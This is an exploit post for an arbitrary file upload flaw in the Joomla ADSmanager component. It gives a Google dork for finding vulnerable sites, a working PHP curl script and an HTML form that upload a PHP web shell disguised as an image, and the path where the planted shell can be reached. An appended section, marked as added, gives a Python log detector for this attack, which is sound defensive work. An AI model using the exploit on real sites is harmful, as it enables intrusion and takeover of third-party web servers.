Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :
<?php
$url = "blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array("file" => "@shell.jpg", "name" => "shell.php");
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

#CSRF :
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload</button>
</form>
Access Shell: site.com/tmp/plupload/shell.php
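
Added example (not part of the original post): a check a defender can run over web server access logs for the request pattern described above, a POST to index.php with option=com_adsmanager and task=upload followed by a request for a script file under /tmp/plupload/. The combined log format, the sample log lines and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Script extensions that should never be served from the upload temp directory.
SCRIPT_RE = re.compile(r'/tmp/plupload/[^/]+\.(?:php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return (ip, kind, path) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    qs = {k.lower(): v[0].lower() for k, v in parse_qs(url.query).items()}
    if (m['method'] == 'POST' and qs.get('option') == 'com_adsmanager'
            and qs.get('task') == 'upload'):
        return m['ip'], 'upload', url.path
    if SCRIPT_RE.search(url.path) and m['status'] == '200':
        return m['ip'], 'script_hit', url.path
    return None

def find_incidents(lines):
    """List script hits under tmp/plupload; flag those preceded by an upload POST."""
    uploaders, incidents = set(), []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ip, kind, path = hit
        if kind == 'upload':
            uploaders.add(ip)
        else:
            incidents.append({'ip': ip, 'path': path, 'after_upload': ip in uploaders})
    return incidents

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Mar/2015:10:00:01 +0000] "POST /index.php?option=com_adsmanager&task=upload&tmpl=component HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2015:10:00:05 +0000] "GET /tmp/plupload/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2015:10:01:00 +0000] "GET /index.php?option=com_adsmanager&view=list HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2015:10:02:00 +0000] "GET /tmp/plupload/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

for incident in find_incidents(SAMPLE):
    print(incident)
```

A script hit reported with after_upload set to False still deserves review, since the upload request may have come from a different address or fallen outside the log window.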